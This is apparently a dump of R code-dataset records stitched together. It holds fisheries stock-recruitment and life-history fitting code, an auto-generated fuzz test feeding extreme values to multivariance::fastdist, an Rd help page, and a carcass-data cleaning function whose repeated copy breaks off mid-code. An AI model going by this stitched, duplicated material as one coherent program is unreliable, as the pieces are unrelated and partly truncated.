## NOTE(review): despite the name, `Recruitment6` here holds the RICKER
## prediction (the BH fit further down reuses the name for its own output).
Recruitment6 <- exp(alphar)*data$SSB*exp(betar*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd <-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2]
# Theoretical SSB1
## Redfish Ricker curve on a theoretical SSB grid (0-9 Mt in 0.1 Mt steps),
## with lognormal and AR(1)-autocorrelated stochastic variants.
SSB1<-seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
redRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
## BUGFIX: the plot call referenced `redRecruitment5_2018`, which is never
## defined in this script (only `redRecruitment5` is), so it errored.
plot(redRecruitment5~SSB1,type="l",col="blue") #xlim=c(0, 3000000), ylim=c(0, 10e+08), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
## NOTE(review): the overlays below referenced 2018/2019-assessment
## comparison objects (`redRec6_2018`, `redRec6_2019`,
## `redRecruitment5_2019`) that are not created anywhere in this script;
## kept commented out until those objects are rebuilt.  The first line was
## also a duplicate of points(Rec~SSB) above.
#points(y=Rec, x=SSB)
#points(y=1/redRec6_2018, x=SSB1, col="blue")
#points(y=1/redRec6_2019, x=SSB1, col="red")
#points(y=redRecruitment5_2019, x=SSB1, col="red", pch=3)
##---- Compare with assessed SSB --- SSB real data
## Ricker predictions evaluated on the assessed SSB series, plus the two
## stochastic variants, overlaid on the theoretical curve.
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(redRecruitment5~SSB1,type="l",col="red") # xlim= c(0, 10e+05), ylim=c(0, 2e+09))
## BUGFIX: this overlay previously re-plotted the deterministic
## `Recruitment5`; the matching NSSH and cod sections plot the stochastic
## `Recruitment5.1` here (blue, pch=1), so do the same for redfish.
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
## Reload the AFWG2019 redfish series and fit the linearised BH.
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
## `redRecruitment6` is on the 1/R scale; it is inverted when plotted/used.
redRecruitment6 <- betabh + alphabh * (1/SSB1) # testing the alpha and beta, works!
plot(1/redRecruitment6 ~ SSB1,type="l",col="red")
points(x=SSB, y=Rec)
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#---- Plotting all ----#
## Deterministic Ricker vs BH curves on the theoretical SSB grid.
rec.vector <- c(redRecruitment5, 1/redRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(redRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
  scale_color_brewer(palette="Accent") +
  theme_bw() + theme(panel.background = element_blank(),
                     panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
                     axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
                     axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
                     axis.title.y = element_text(size=20))
##### Maturity #####
## Redfish maturity-at-age (ages 6-19): logistic ogive fitted via TMB.
## BUGFIX: this section previously used the single name `maturity` both for
## the melted data frame AND, further down, for the fitted ogive vector
## "used in simulation".  The vector assignment clobbered the data frame,
## so `maturity$mprop.est <- ...` and the subsequent ggplot/geom_point
## calls operated on a plain numeric vector and failed.  The data frame is
## now `maturity2`, consistent with the NSSH and cod sections.
maturity2 <-melt(redfishmaturity,id.vars="Year")
maturity2$Age <- rep(6:19,each=dim(redfishmaturity)[1])
maturity2 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/maturity.cpp')
dyn.load(dynlib('Scripts_R/maturity'))
data<-list()
data$age<-maturity2$Age
data$mprop<-maturity2$value
param <- list()
param$a50 <- 4        # starting value: age at 50% maturity
param$env <- .2       # starting value: ogive slope parameter
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((unique(age)-a50)/env))),2) ## used in simulation
maturity2$mprop.est <- 1/(1+exp(-((maturity2$Age-a50)/env)))
redmat<- maturity2 %>%
  ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) +
  labs(y= "Maturity", x= "Age") +
  theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
## Extrapolate the fitted ogive over the full simulated age range (6-40)
## and redraw `redmat` with the observed points on top.
maturityforplot <- list()
maturityforplot$Age <- c(6:40)
maturityforplot$mprop.est <- 1/(1+exp(-((c(6:40)-a50)/env)))
maturityforplot <- as.data.frame(maturityforplot)
redmat <- ggplot(data=maturityforplot, inherit.aes=F, aes(x=Age,y=mprop.est)) +
  geom_line(color="red",size= 0.6) +
  labs(y= "Maturity", x= "Age") +
  theme_bw() + theme(panel.background = element_blank(),
                     panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
                     axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
                     axis.text.x = element_text(size=20), axis.title.x = element_text(size=30),
                     axis.title.y = element_text(size=30)) + labs(tag="c")
redmat + geom_point(data= maturity2,aes(x=Age,y=value), size= 2.5)
##### Weights #####
## Redfish weight-at-age: W = Winf*(1-exp(-k*age))^b fitted via TMB, then
## extrapolated over ages 6-40 for plotting.
weights2 <-melt(redfishweight,id.vars="Year")
weights2$Age <- rep(6:19,each=dim(redfishweight)[1])
weights2 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/weight.cpp')
dyn.load(dynlib('Scripts_R/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
redwei<- weights2 %>%
  ggplot(aes(x=Age,y=value)) + geom_point(size= 3) +
  geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) +
  labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
## Redraw over the full simulated age range; NOTE(review): this version
## drops the axis titles and the "c" tag used by the first `redwei`.
weightforplot <- list()
weightforplot$Age <- c(6:40)
weightforplot$wprop.est <- Winf * (1-exp(-k * (c(6:40))))^b
weightforplot <- as.data.frame(weightforplot)
redwei <- ggplot(data=weightforplot, inherit.aes=F, aes(x=Age,y=wprop.est)) +
  geom_line(color="red",size= 0.6) +
  theme_bw() + theme(panel.background = element_blank(),
                     panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
                     axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
                     axis.text.x = element_text(size=20), axis.title.x = element_blank(),
                     axis.title.y = element_blank())
redwei + geom_point(data= weights2, aes(x=Age,y=value), size= 2.5)
##### Selectivity #####
## Redfish fishing selectivity: mean F-at-age normalised to [0,1], logistic
## curve fitted via TMB and extrapolated over ages 2-40.
fmort2<-melt(redfishfmort,id.vars="Year")
fmort2$Age <- rep(2:19,each=dim(redfishfmort)[1])
fmort2 %>%
  ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
## NOTE(review): the rest of the redfish section compiles TMB models from
## 'Scripts_R/', but this uses 'Scripts/sel.cpp' -- confirm the path.
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
redfsel <- fmort3 %>%
  ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
  geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6) +
  labs(y= "Fishing selectivity", x= "Age") +
  theme_bw() + theme(panel.background = element_blank(),
                     panel.grid.major = element_blank(),
                     panel.grid.minor = element_blank(),
                     axis.line = element_line(colour = "black"),
                     axis.text.y = element_text(size=20),
                     axis.text.x = element_text(size=20),
                     axis.title.x = element_text(size=20),
                     axis.title.y = element_text(size=20)) + labs(tag="c")
## Redraw over the full simulated age range (2-40), observed points on top.
fselforplot <- list()
fselforplot$Age <- c(2:40)
fselforplot$fselprop.est <- 1/(1+exp(-(((c(2:40))-s50)/ss)))
fselforplot <- as.data.frame(fselforplot)
redfsel <- ggplot(data=fselforplot, inherit.aes=F, aes(x=Age,y=fselprop.est)) +
  geom_line(color="red",size= 0.6) +
  theme_bw() + theme(panel.background = element_blank(),
                     panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
                     axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
                     axis.text.x = element_text(size=20), axis.title.x = element_blank(),
                     axis.title.y = element_blank())
redfsel + geom_point(data= fmort3, aes(x=Age,y=sel), size= 2.5)
## Combined three-species panels (gridExtra::grid.arrange draws to the
## active device).
grid.arrange(nsshmat, codmat, redmat, ncol=3)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(nsshfsel, codfsel, redfsel)
## NOTE(review): last_plot() returns the most recent ggplot object, not the
## grid.arrange composite -- at this point that is the `redfsel` +
## geom_point plot from the selectivity section above; confirm that is the
## figure intended for "fsel_nssh.pdf".
ggsave(filename="fsel_nssh.pdf",
       plot=last_plot(),
       width = 100,
       height = 80,
       units = "mm")
###### PLOTTINg all ############
## NOTE(review): this scratch section referenced per-species maturity
## objects (`maturitynssh`, `maturitycod`, `maturityred`, `capematurity`,
## `capmat`) that are never created in this script, called purrr::map2()
## with four inputs (it accepts exactly two), and passed non-existent
## `by.z`/`all.z` arguments to merge().  In addition,
## `params + geom_point(aes(y= ))` was a PARSE ERROR (missing argument in
## aes()) that prevented the whole file from being sourced.  The broken
## statements are kept below, commented out, until the missing objects are
## rebuilt.
#maturitynssh$species <- "NSSH"
#maturitycod$species <- "cod"
#maturityred$species <- "redfish"
#maturitynssh <- as.data.frame(maturitynssh)
#maturitycod <- as.data.frame(maturitycod)
#maturityred <- as.data.frame(maturityred)
#cbind(maturitycod, maturitynssh, maturityred, capematurity)
#map2(maturitynssh, maturitycod, maturityred, capmat, left_join)
#matall <- merge(maturitynssh, maturitycod, maturityred, by.x = "mprop.est", by.y = "Age", by.z = "species", all.x = T, all.y = T, all.z= T)
## Re-plot mean fishing selectivity with the fitted logistic curve
## (uses the redfish `fmort3` from the selectivity section above).
params <- fmort3 %>%
  ggplot(aes(x=Age,y=sel)) + geom_point() +
  geom_line(inherit.aes=F,aes(x=Age,y=sel.est))+ labs(y= "Fishing selectivity", x= "age") + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"))
#params <- params + geom_point(aes(y= ))  # parse error: aes(y= ) has a missing argument
## Combined panels per trait (redfish / NSSH / cod).
grid.arrange(redmat, nsshmat, codmat)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(redfsel, nsshfsel, codfsel)
|
testlist <- list(x = structure(c(2.31584307392677e+77, 9.53818252170339e+295, 1.22812917813345e+146, 4.12396251261199e-221, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), .Dim = c(5L, 7L)))
result <- do.call(multivariance::fastdist,testlist)
str(result) | /multivariance/inst/testfiles/fastdist/AFL_fastdist/fastdist_valgrind_files/1613098437-test.R | no_license | akhikolla/updatedatatype-list3 | R | false | false | 303 | r | testlist <- list(x = structure(c(2.31584307392677e+77, 9.53818252170339e+295, 1.22812917813345e+146, 4.12396251261199e-221, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), .Dim = c(5L, 7L)))
result <- do.call(multivariance::fastdist,testlist)
str(result) |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/linefuns.R
\name{line_length}
\alias{line_length}
\title{Calculate length of lines in geographic CRS}
\usage{
line_length(l, byid = TRUE)
}
\arguments{
\item{l}{A SpatialLinesDataFrame}
\item{byid}{Logical determining whether the length is returned per object (default is \code{TRUE}).}
}
\description{
Calculate length of lines in geographic CRS
}
| /man/line_length.Rd | permissive | stevenysw/stplanr | R | false | true | 421 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/linefuns.R
\name{line_length}
\alias{line_length}
\title{Calculate length of lines in geographic CRS}
\usage{
line_length(l, byid = TRUE)
}
\arguments{
\item{l}{A SpatialLinesDataFrame}
\item{byid}{Logical determining whether the length is returned per object (default is \code{TRUE}).}
}
\description{
Calculate length of lines in geographic CRS
}
|
#' @title Clean North East Oregon Carcass Data - from ODFW Access DB
#' @description Processes the raw ODFW Access DB carcass dataset and standardizes to join with clean_carcassData(CDMS_dat)
#' @param data Data obtained from premade query in ODFW Access DB. !!Export data as text file, comma separated, headers included.!!
#'   Import the text file with: read.delim(file = 'path_to_file.txt', sep = ',', header = TRUE)
#' @export
#' @import dplyr lubridate
#' @author Tyler T. Stright
#' @examples
#' clean_carcassData_NEOR(car_dat)
#'
clean_carcassData_NEOR <- function(data){
{if(is.null(data))stop("carcass data must be supplied")}
# NOTE: Fields not captured from carcass query: "Subbasin" "MEPSlength" "CWTAge" "BestAge" "PITage" "LengthAge" "AgeKey"
# "PIT2" "BestScaleAge" "Adult_or_Jack" "MarkRecapSizeCategory" "TagFile" "ExternalMarks" "Population"
# filter for GRSME only?
#WHERE(b.Subbasin IN ('Imnaha', 'Wallowa-Lostine', 'Wilderness-Wenaha', 'Wilderness-Minam'))
data_clean <- data %>%
mutate(
ESU_DPS = 'Snake River Spring/Summer-run Chinook Salmon ESU',
MPG = 'Grande Ronde / Imnaha',
POP_NAME = case_when(
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River mainstem',
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River == 'Wenaha River' ~ 'Wenaha River'
),
TRT_POPID = case_when(
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'GRLOS',
River == 'Minam River' ~ 'GRMIN',
River == 'Wenaha River' ~ 'GRWEN',
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'IRBSH',
River == 'Imnaha River' ~ 'IRMAI'
),
Species = 'Chinook salmon',
Run = 'Spring/summer',
ReportingGroup = case_when( # in between tributary and population: transect/tributary/reporting group/population/mpg/esu
River %in% c('Big Sheep Creek', 'Lick Creek','Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River',
River == 'Lostine River' ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River %in% c('Bear Creek', 'Hurricane Creek', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Wallowa River',
River == 'Wenaha River' ~ 'Wenaha River'
),
StreamName = River,
TribToName = case_when(
River %in% c('Little Sheep Creek', 'Lick Creek') ~ 'Big Sheep Creek',
River %in% c('Wallowa River','Wenaha River') ~ 'Grande Ronde River',
River == 'Big Sheep Creek' ~ 'Imnaha River',
River == 'Imnaha River' ~ 'Snake River',
River %in% c('Bear Creek', 'Lostine River', 'Hurricane Creek', 'Minam River', 'Prairie Creek', 'Parsnip Creek', 'Spring Creek') ~ 'Wallowa River'
),
LocationLabel = Section,
TransectName = SiteID,
SurveyDate = lubridate::ymd(gsub('T00:00:00', '', SurveyDate)),
SurveyYear = lubridate::year(SurveyDate),
ActivityDate = paste0(SurveyDate, 'T00:00:00'),
ActivityId = as.integer(SurveyID),
DatasetId = NA_integer_,
LocationId = NA_integer_,
TargetSpecies = 'S_CHN',
Pass = NA_integer_,
StartSurvey = NA_character_,
EndSurvey = NA_character_,
StartTime = Start_Time,
EndTime = End_Time,
Observers = Surveyors,
SurveyMethod = 'Ground',
GPSUnit = NA_character_, # No GPS for Carcasses.
Datum = NA_character_,
Weather = NA_character_,
Visibility = Visibility,
SurveyComments = paste0('Survey_Type: ', Survey_Type, '; ', Comments_SurveyEvent),
SampleNumber = GeneticsNumber,
HistoricSampleNumber = NA_character_,
CarcassSpecies = 'S_CHN',
Sex = case_when(
Sex == 'M' ~ 'Male',
Sex == 'F' ~ 'Female',
Sex == 'J' ~ 'Jack',
Sex %in% c('Unk', 'UNK') ~ 'Unknown'
),
ForkLength = ForkLength,
PercentSpawned = if_else(Sex == 'Male', NA_integer_, as.integer(round(PercentSpawned, 0))),
# SpawnedOut = case_when( # First Go - remove if other logic is best
# PreSpawn == 'Spawned' ~ 'Yes',
# PreSpawn == 'PreSpawn' ~ 'No',
# PreSpawn %in% c('', 'NotValid', 'Unknown') ~ 'Unknown',
# TRUE ~ NA_character_
# ),
SpawnedOut = case_when( # anti-PrespawnMort?
PercentSpawned < 50 ~ 'No', # Indicates a Prespawn Mortality
PercentSpawned >= 50 ~ 'Yes', # Successful Spawner
TRUE ~ NA_character_
),
OpercleLeft = if_else(grepl('LOP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*LOP'), NA_character_),
OpercleRight = if_else(grepl('ROP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*ROP'), NA_character_),
PITScanned = case_when(
PITscan == 'PIT tag present' ~ 'Yes',
PITscan == 'No PIT tag' ~ 'No',
PITscan == 'Not Scanned' ~ 'Unknown',
),
PITCode = PIT1, # no data in PIT2
AdiposeFinClipped = case_when( # Assuming all Hatchery fish are ad-clipped
grepl('ad', FinMark, ignore.case = T) ~ 'Yes',
grepl('unk', FinMark, ignore.case = T) | FinMark == '' ~ 'Unknown',
TRUE ~ 'No'
),
CWTScanned = if_else(`CWT(Y/N)` == 'Unk', 'Unknown', `CWT(Y/N)`),
SnoutCollected = case_when( # This may need to be revisited
grepl('\\d{2}[[:alpha:]]{1}\\d{4}', SnoutID) ~ 'Yes',
grepl('DB\\d{3}', SnoutID) ~ 'Yes',
TRUE ~ 'No'
),
Fins = NA_character_,
Scales = NA_character_,
Otolith = NA_character_,
Count = as.double(Count),
CarcassComments = Comments,
Latitude = NA_character_, # no lat/long for carcasses
Longitude = NA_character_,
RadioTag = if_else(RadioTag == 1, 'Yes', 'No'),
TransmitterType = NA_character_,
Vendor = NA_character_,
SerialNumber = NA_character_,
Frequency = NA_character_,
Channel = NA_character_,
Code = NA_character_,
TagsFloy = NA_character_,
TagsVIE = NA_character_,
TagsJaw = NA_character_,
TagsStaple = NA_character_, # didn't see anything in the database
TagsSpaghetti = NA_character_,
MarksVentralFin = NA_character_, # Extract LV/RV from FinMark ****************
Notes = NA_character_,
QAStatusId = NA_integer_,
CWTCode = CWTcode,
TagsPetersonDisk = NA_character_, # didn't see anything in the database
CarcassWPT = as.character(CarcassID),
DNACollected = NA_character_, # won't affect analysis
ActivityQAStatusId = NA_integer_,
ActivityQAComments = NA_character_,
FieldsheetLink = as.logical(NA),
QAStatusName = NA_character_,
EffDt = NA_character_,
Year = as.integer(Year),
AboveWeir = case_when(
is.na(AboveOrBelowWeir) | AboveOrBelowWeir == '' ~ NA_character_,
AboveOrBelowWeir %in% c('Above Weir', 'Diversion','Lostine Weir') ~ 'Yes',
AboveOrBelowWeir %in% c('Below Weir', 'BeforeWeir', 'No Weir', 'No weir', 'Now Weir') ~ 'No',
TRUE ~ 'Unknown'
),
AbovePITArray = 'Yes', # WR2 = Wallowa River Site, Wenaha=Yes, Minam=Yes. Imnaha=Yes.
AboveRST = case_when(
River %in% c('Wenaha River','Wallowa River') ~ 'No',
TribToName == 'Wallowa River' & !River %in% c('Minam River','Lostine River') ~ 'No',
River == 'Lostine River' & SiteID %in% c('LOS8','LOS8.1','LOS8.2','LOSW','LOSTULLEY') ~ 'No',
TRUE ~ 'Yes'
),
Origin = case_when(
Origin %in% c('Nat') ~ 'Natural',
# HON are non-clipped fish that weren't scanned in 2011. Assumed to be Naturals, but not positive b/c no CWT Scan.
Origin %in% c('DS.Hat','Hat') ~ 'Hatchery', # DS.Hat = hatchery determined by Discriminate Scale Analysis...
# ...where hatchery was determined by the distance between the origin and first annulus..
TRUE ~ 'Unknown' # HON = Unknown
),
Mark_Discernible = case_when(
OPPunch %in% c('Yes','No','yes','no', 'NO')
& MarkRecapSizeCategory %in% c('Adult','Jack','MiniJ') ~ TRUE,
TRUE ~ FALSE),
#OPPunch is the NEOR field for whether the passed upstream mark(s) are discernible on the carcass
#MarkRecapSizeCategory is the NEOR bread-crumb trail of whether to include/exclude carcasses in MR analyses
#we could use the MarkRecapSizeCategory criteria during cleaning or when stratifying data for input into cuyem functions
#using MarkRecapSizeCategory later would be more straightforward, otherwise we are hiding info that doesn't have anything to do
#with whether the mark is discernable, e.g., it was a radio-tagged carcass that was only found because of it's radio-tag
#similarly, above/below weir probably doesn't need to be incorporated into this variable
#but it all depends on how Kinzer wants to use the variable
Recapture = case_when(
Mark_Discernible == TRUE & OPPunch %in% c('Yes','yes') ~ TRUE,
TRUE ~ FALSE),
MR_strata = MarkRecapSizeCategory,
CWT_Age = ifelse(CWTAge>0,CWTAge, NA),
VIE_Age = NA_integer_,
PIT_Age = ifelse(PITage>0,PITage, NA),
Fin_Age = NA_integer_,
Scale_Age = ifelse(BestScaleAge>0,BestScaleAge, NA)
) %>%
# filter(MarkRecapSizeCategory %in% c('Adult','Adult NA')) %>% # This probably won't live here forever.
select(
ESU_DPS,
MPG,
POP_NAME,
TRT_POPID,
Species,
Run,
ReportingGroup,
StreamName,
TribToName,
LocationLabel,
TransectName,
SurveyYear,
SurveyDate,
ActivityDate,
ActivityId,
DatasetId,
LocationId,
TargetSpecies,
Pass,
StartSurvey,
EndSurvey,
StartTime,
EndTime,
Observers,
SurveyMethod,
GPSUnit,
Datum,
Weather,
Visibility,
SurveyComments,
SampleNumber,
HistoricSampleNumber,
CarcassSpecies,
Sex,
ForkLength,
SpawnedOut,
PercentSpawned,
OpercleLeft,
OpercleRight,
PITScanned,
PITCode,
AdiposeFinClipped,
CWTScanned,
SnoutCollected,
Fins,
Scales,
Otolith,
Count,
CarcassComments,
Latitude,
Longitude,
RadioTag = RadioTag,
TransmitterType,
Vendor,
SerialNumber,
Frequency,
Channel,
Code,
TagsFloy,
TagsVIE,
TagsJaw,
TagsStaple,
TagsSpaghetti,
MarksVentralFin,
Notes,
QAStatusId,
CWTCode,
TagsPetersonDisk,
CarcassWPT,
DNACollected,
ActivityQAStatusId,
ActivityQAComments,
FieldsheetLink,
QAStatusName,
EffDt,
Year,
AboveWeir,
AbovePITArray,
AboveRST,
Origin,
Mark_Discernible,
Recapture,
MR_strata,
CWT_Age,
VIE_Age,
PIT_Age,
Fin_Age,
Scale_Age)
return(data_clean)
}
| /R/clean_CarcassData_NEOR.R | no_license | ryankinzer/cuyem | R | false | false | 10,842 | r | #' @title Clean North East Oregon Carcass Data - from ODFW Access DB
#' @description Processes the raw ODFW Access DB carcass dataset and standardizes to join with clean_carcassData(CDMS_dat)
#' @param data Data obtained from premade query in ODFW Access DB. !!Export data as text file, comma separated, headers included.!!
#' @param data Import text file with: read.delim(file = 'path_to_file.txt', sep = ',', header = TRUE)
#' @export
#' @import dplyr lubridate
#' @author Tyler T. Stright
#' @examples
#' clean_carcass_Data(car_dat)
#'
clean_carcassData_NEOR <- function(data){
{if(is.null(data))stop("carcass data must be supplied")}
# NOTE: Fields not captured from carcass query: "Subbasin" "MEPSlength" "CWTAge" "BestAge" "PITage" "LengthAge" "AgeKey"
# "PIT2" "BestScaleAge" "Adult_or_Jack" "MarkRecapSizeCategory" "TagFile" "ExternalMarks" "Population"
# filter for GRSME only?
#WHERE(b.Subbasin IN ('Imnaha', 'Wallowa-Lostine', 'Wilderness-Wenaha', 'Wilderness-Minam'))
data_clean <- data %>%
mutate(
ESU_DPS = 'Snake River Spring/Summer-run Chinook Salmon ESU',
MPG = 'Grande Ronde / Imnaha',
POP_NAME = case_when(
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River mainstem',
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River == 'Wenaha River' ~ 'Wenaha River'
),
TRT_POPID = case_when(
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'GRLOS',
River == 'Minam River' ~ 'GRMIN',
River == 'Wenaha River' ~ 'GRWEN',
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'IRBSH',
River == 'Imnaha River' ~ 'IRMAI'
),
Species = 'Chinook salmon',
Run = 'Spring/summer',
ReportingGroup = case_when( # in between tributary and population: transect/tributary/reporting group/population/mpg/esu
River %in% c('Big Sheep Creek', 'Lick Creek','Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River',
River == 'Lostine River' ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River %in% c('Bear Creek', 'Hurricane Creek', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Wallowa River',
River == 'Wenaha River' ~ 'Wenaha River'
),
StreamName = River,
TribToName = case_when(
River %in% c('Little Sheep Creek', 'Lick Creek') ~ 'Big Sheep Creek',
River %in% c('Wallowa River','Wenaha River') ~ 'Grande Ronde River',
River == 'Big Sheep Creek' ~ 'Imnaha River',
River == 'Imnaha River' ~ 'Snake River',
